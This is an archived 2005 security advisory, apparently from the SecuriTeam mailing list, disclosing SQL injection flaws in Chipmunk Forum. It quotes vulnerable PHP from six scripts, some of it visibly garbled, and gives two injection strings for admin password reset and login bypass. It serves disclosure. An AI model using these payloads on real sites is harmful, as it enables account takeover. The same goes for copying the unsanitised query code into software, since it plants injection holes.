From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 6 Feb 2005 18:25:48 +0200
Subject: [UNIX] Multiple SQL Injection Vulnerabilties in Chipmunk Forum
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050206165525.706335791@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple SQL Injection Vulnerabilties in Chipmunk Forum
------------------------------------------------------------------------
SUMMARY
Chipmunk Forum is "a small yet flexible and fully featured forum system".
Due to inadequate filtering by Chipmunk Forum's PHP scripts a remote
attacker can cause the program to insert arbitrary SQL statements into
existing ones, allowing him to gain elevated privileges to the forum,
change information of users, obtain passwords, etc.
DETAILS
Vulnerable script getpassword.php
Vulnerable code:
if(isset($_POST['submit']))
{
$email=$_POST['email'];
$getinfo="SELECT * from b_users where email='$email'";
...
mail("$email","Your Forum password","Your forum password has been set to
$value");
Exploit:
Use the following as the email: [email protected]' or username='Administrator
this will change password the password oft the Administrator account (The
"Administrator" must be a valid user name).
Vulnerable script authenticate.php
Vulnerable code:
$username=$_POST['user'];
$password=$_POST['password'];
$password=md5($password);
$query = "select * from b_users where username='$username' and
password='$password' and validated='1'";
Exploit:
At the login.php page enter as the username Administrator'/*
Vulnerable script edit.php
Vulnerable code:
if(isset($_POST['ID']))
{
$ID=$_POST['ID'];
}
else
{
$ID=$_GET['ID'];
}
$checking="SELECT * from b_posts,b_users where
b_users.userID=b_posts.author and b_posts.ID='$ID'";
It is possible to inject SQL statements through the $ID variable.
Vulnerable script search.php
Vulnerable code:
$searchterm=$_POST['searchterm'];
$getthreads="SELECT * from b_posts where post like '%$searchterm%' and
threadparent='0' order by telapsed DESC limit $start, 50";
It is possible to inject SQL statements through $searchterm parameter.
Vulnerable script newtopic.php
Vulnerable code:
$name=$_POST['name'];
$title=$_POST['title'];
$post=$_POST['post'];
$day=date("D M d, Y H:i:s");
$timegone=date("U") ;
if($_POST['nosmiley'])
..
$name=strip_tags($name);
$title=strip_tags($title);
$post=strip_tags($post);
$posting="INSERT INTO b_posts (author, title, post,timepost,
telapsed, postforum,lastpost,nosmilies,ipaddress) values ('$name',
'$title', '$post', '$day',
'$timegone','$forumID','$user','$nosmiley','$s')";
mysql_query($posting) or die("could not post");
It is possible to inject SQL statements through $name, $title, and $post
parameters.
Vulnerable script reguser.php
Vulnerable code:
$username=$_POST['username'];
$password=$_POST['password'];
$signature=$_POST['signature'];
$pass2=$_POST['pass2'];
$usercheck="SELECT*from b_users where username='$username' or
email='$email'";
..
if ($password==$pass2 && $_POST['password'])
{
$password=md5($password);
$supervalue=$value;
$daycte("U");
$email=$_POST['email'];
$location=$_POST['location'];
$aim=$_POST['aim'];
$showprofile=$_POST['showprofile'];
$icq=$_POST['icq'];
$seedval=$day#0000;
srand($seedval);
$key=RAND(1000000,2000000);
if($requirekey=="no"||$requirekey=="No") //if you do no require an
activation key
{
$SQL ="INSERT into b_users (username, password, sig, email, location,
AIM, ICQ, showprofile, validated) values ('$username', '$password',
'$signature', '$email', '$location', '$aim', '$icq', '$showprofile',
'1')";
mysql_query($SQL) or die(mysql_error());
}
else //you require an activation key
{
$SQL ="INSERT into b_users (username, password, sig, keynode, email,
location, AIM, ICQ, showprofile) values ('$username', '$password',
'$signature', '$key', '$email', '$location', '$aim', '$icq',
'$showprofile')";
mysql_query($SQL) or die(mysql_error());
mail("$email","Your forum activation key","Paste the URL to activate
your account.
$boardpath/activate.php?username=$username&password=$password&keynode=$key");
}
It is possible to inject SQL statements through the registration form's
variables.
ADDITIONAL INFORMATION
The information has been provided by <mailto:foster@ghc.ru.> GHC vision.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
